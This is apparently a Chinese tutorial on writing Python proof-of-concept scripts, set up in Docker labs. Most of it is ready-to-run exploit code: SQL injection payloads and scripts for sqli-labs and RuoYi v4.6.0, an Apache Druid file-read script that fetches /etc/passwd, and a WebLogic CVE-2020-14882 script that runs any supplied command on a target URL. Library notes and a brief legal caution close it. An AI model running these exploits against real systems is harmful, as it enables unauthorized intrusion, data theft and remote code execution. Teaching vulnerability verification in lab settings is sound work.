Python Poc编写实例:从原理到实践
字数 1172 2025-08-24 07:48:33
Python PoC编写实例:从原理到实践
一、PoC基础概念
PoC (Proof of Concept, 概念验证) 是为了验证某个潜在的漏洞或安全问题而编写的脚本。主要目的是:
- 验证漏洞是否存在
- 提供漏洞存在的证据
- 为后续开发完整利用工具(EXP)奠定基础
二、SQL注入PoC编写
1. 环境搭建
使用Docker搭建sqli-lab漏洞环境:
docker search sqli-lab
docker pull acgpiano/sqli-labs
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs
2. GET型单引号报错注入(Less-1)
Payload示例:
' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs
Python PoC代码:
import requests
url = "http://192.168.148.155/Less-1/?id=1"
headers = {
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
payload = "' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs"
res = requests.get(url + payload, headers=headers, timeout=5)
if "XPATH syntax error: '~5.5.44-0ubuntu0.14.04.1~'" in res.text:
print('[+]Vulnerable to SQL injection: ' + url)
else:
print('[-] Not Vulnerable: ' + url)
3. POST型单引号报错注入(Less-11)
Python PoC代码:
import requests
url = "http://192.168.148.155/Less-12/"
headers = {
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
payload = {
"uname": "' AND (updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)) AND 'utgs'='utgs",
"passwd": "123456",
"submit": "Submit"
}
res = requests.post(url, headers=headers, data=payload, timeout=5)
if "XPATH syntax error: '~5.5.44-0ubuntu0.14.04.1~'" in res.text:
print('[+] Vulnerable to SQL injection: ' + url)
else:
print('[-] Not Vulnerable: ' + url)
4. POST型单引号延时注入(Less-15)
Payload示例:
1' AND (SELECT 2707 FROM (SELECT(SLEEP(5)))vWgP) AND 'xDGW'='xDGW
Python PoC代码:
import requests
import time
url = "http://192.168.148.155/Less-15/"
headers = {
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36"
}
payload = {
"uname": "1' AND (SELECT 2707 FROM (SELECT(SLEEP(5)))vWgP) AND 'xDGW'='xDGW",
"passwd": "123456",
"submit": "Submit"
}
start_time = time.time()
res = requests.post(url, headers=headers, data=payload, timeout=10)
end_time = time.time()
if end_time - start_time > 5:
print('[+] Vulnerable to SQL injection')
else:
print('[-] Not vulnerable to SQL injection')
5. 若依v4.6.0后台SQL注入
完整PoC代码:
import requests
import argparse
def argument():
parser = argparse.ArgumentParser(description="python3 demo.py -u [login_url] -c [cookie] -v [Verification_Code] -b [Vul Links]")
parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
parser.add_argument('-c', '--cookie', type=str, metavar='', required=True, help='Please input the vul target cookie')
parser.add_argument('-v', '--validateCode', type=int, metavar='', required=True, help='Please inpute the verification code')
parser.add_argument('-b', '--bgurl', type=str, metavar='', required=True, help='Please inpute the Login background vulnerable url')
return parser.parse_args()
def banner():
print("""
__
| |
| | |_ __
| | |_ v 4.6.0
""")
def Poc(url, cookie, validateCode, bgurl):
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
'Cookie': cookie
}
data = {
'username': 'admin',
'password': 'admin123',
'validateCode': validateCode,
'rememberMe': 'false'
}
res = requests.post(url, headers=headers, data=data, timeout=5)
if "操作成功" in res.text:
post_url = bgurl
post_data = {
'pageSize': '10',
'pageNum': '1',
'orderByColumn': 'roleSort',
'isAsc': 'asc',
'roleName': '',
'roleKey': '',
'status': '',
'params%5BbeginTime%5D': '',
'params%5BendTime%5D': '',
'params[dataScope]': 'and+updatexml(1,concat(0x7e,(SELECT+version()),0x7e),1)%2523'
}
post_headers = headers
post_requests = requests.post(url=post_url, data=post_data, headers=post_headers)
if "java.sql.SQLException: XPATH syntax error:" in post_requests.text:
print("[+] Vulnerable to SQL injection")
else:
print("[-] Not vulnerable to SQL injection")
elif "验证码错误":
print("[-] Error Occurred, Please Check you input")
if __name__ == '__main__':
banner()
args = argument()
Poc(args.url, args.cookie, args.validateCode, args.bgurl)
三、任意文件读取PoC编写
Apache Druid LoadData任意文件读取(CVE-2021-36749)
环境搭建:
# 进入CVE-2021-25646目录
docker-compose up -d
影响版本:Apache Druid Version < 0.22
PoC代码:
import requests
import argparse
def argument():
parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
return parser.parse_args()
def banner():
print("""
__
/ |
| |
| \_
""")
def Poc(url):
lists = ["file:///etc/passwd", "file:///C:/Windows/win.ini"]
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)'
}
try:
for list in lists:
post_data = {
"type": "index",
"spec": {
"type": "index",
"ioConfig": {
"type": "index",
"inputSource": {
"type": "http",
"uris": [list]
},
"inputFormat": {
"type": "regex",
"pattern": "(.*)",
"columns": ["raw"]
}
},
"dataSchema": {
"dataSource": "sample",
"timestampSpec": {
"column": "!!!_no_such_column_!!!",
"missingValue": "1970-01-01T00:00:00Z"
},
"dimensionsSpec": {}
},
"tuningConfig": {
"type": "index"
}
},
"samplerConfig": {
"numRows": 500,
"timeoutMs": 15000
}
}
res = requests.post(url, json=post_data, headers=headers, verify=False, allow_redirects=False)
if "root:x" in res.text or "[fonts]" in res.text:
print("[+] 存在 Apache Druid LoadData 任意文件读取漏洞")
break
else:
print("[-] 不存在 Apache Druid LoadData 任意文件读取漏洞")
break
except Exception as e:
print("[-] 请检查输入是否有误")
if __name__ == '__main__':
banner()
args = argument()
Poc(args.url)
四、远程命令执行(RCE)PoC编写
Weblogic CVE-2020-14882未授权远程命令执行
环境搭建:
# 进入CVE-2020-14882目录
docker-compose up -d
影响版本:
- WebLogic Server 10.3.6.0.0
- WebLogic Server 12.1.3.0.0
- WebLogic Server 12.2.1.3.0
- WebLogic Server 12.2.1.4.0
- WebLogic Server 14.1.1.0.0
PoC代码:
import requests
import argparse
import http.client
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
def argument():
parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url] -c [command]")
parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='[*] Please assign vulnerable url')
parser.add_argument('-c', '--cmd', type=str, metavar='', required=True, help='[*] Please assign command')
return parser.parse_args()
def banner():
print("""
__
/ |
| |
| \_
""")
def Poc():
args = argument()
url = args.url
cmd = args.cmd
path = "/console/images/%252E%252E%252Fconsole.portal"
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-GB,en-US;q=0.9,en;q=0.8',
'Content-Type': 'application/x-www-form-urlencoded',
'cmd': cmd
}
payload = '''_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if (cmd != null) {String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();res.getWriter().write("");}executeThread.interrupt();'''
try:
res = requests.post(url=url+path, data=payload, headers=headers, verify=False, allow_redirects=False, timeout=10)
print("[+] Command results are as follows: ")
print(res.text)
except Exception as e:
print("[-] Please Check your url and cmd!")
if __name__ == '__main__':
banner()
Poc()
五、任意文件上传PoC编写
Weblogic任意文件上传(CVE-2018-2894)
环境搭建:
# 进入weblogic CVE-2018-2894目录
docker-compose up -d
影响版本:
- WebLogic Server 10.3.6.0.0
- WebLogic Server 12.1.3.0.0
- WebLogic Server 12.2.1.2.0
- WebLogic Server 12.2.1.3.0
PoC代码:
import requests
import argparse
def argument():
parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
return parser.parse_args()
def banner():
print("""
__
/ |
| |
| \_
""")
def Poc():
args = argument()
url = args.url
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36'
}
try:
res = requests.get(url + "/ws_utc/resources/setting/options/general", headers=headers, timeout=5, verify=False, allow_redirects=False)
if "<name>BasicConfigOptions.workDir</name>" in res.text:
print("[+] 存在 CVE-2018-2894 WebLogic任意文件上传漏洞")
else:
print("[-] 不存在 CVE-2018-2894 WebLogic 任意文件上传漏洞")
except Exception as e:
print("[-] 请检查输入是否有误!")
if __name__ == '__main__':
banner()
Poc()
六、Python库使用技巧
1. argparse库
用于参数化输入:
import argparse
parser = argparse.ArgumentParser(description="usage:python3 demo.py -u [url]")
parser.add_argument('-u', '--url', type=str, metavar='', required=True, help='Please input the vulnerable url')
args = parser.parse_args()
2. sys库
另一种参数化输入方式:
import sys
if len(sys.argv) != 3:
print("使用方法: python myapp.py <参数1> <参数2>")
sys.exit(1)
url = sys.argv[1]
command = sys.argv[2]
3. json库
处理JSON数据:
import json
# 解析JSON字符串
json_str = '{"name": "John", "age": 30, "city": "New York"}'
data = json.loads(json_str)
print(data["name"])
# 生成JSON字符串
data = {"name": "John", "age": 30, "city": "New York"}
json_str = json.dumps(data)
print(json_str)
# 从文件读取JSON
with open("data.json") as json_file:
data = json.load(json_file)
print(data["name"])
# 写入JSON到文件
with open("data.json", "w") as json_file:
json.dump(data, json_file)
4. time库
时间相关操作:
import time
# 获取当前时间戳
timestamp = time.time()
# 时间戳转可读时间
readable_time = time.ctime(timestamp)
# 延迟执行
time.sleep(2)
# 记录代码执行时间
start_time = time.time()
# 执行代码
end_time = time.time()
execution_time = end_time - start_time
5. open函数
文件操作:
# 读取文件
with open('file.txt', 'r') as file:
content = file.read()
# 逐行读取
with open('file.txt', 'r') as file:
for line in file:
print(line)
# 写入文件
with open('file.txt', 'w') as file:
file.write('Hello, World!\n')
# 追加内容
with open('file.txt', 'a') as file:
file.write('This is an additional line.\n')
七、PoC编写总结
-
基本流程:
- 分析漏洞触发点
- 确定验证方式(特征码、延时、报错等)
- 编写请求代码
- 处理响应判断漏洞存在性
-
关键点:
- 请求头设置(User-Agent、Cookie等)
- 请求方法选择(GET/POST)
- 参数编码处理
- 响应特征匹配
-
进阶技巧:
- 使用模块化设计(函数封装)
- 添加参数化输入
- 异常处理
- 多Payload遍历测试
-
注意事项:
- 遵守法律法规
- 仅用于授权测试
- 添加适当的延迟避免对目标造成过大压力
- 清晰的输出和错误提示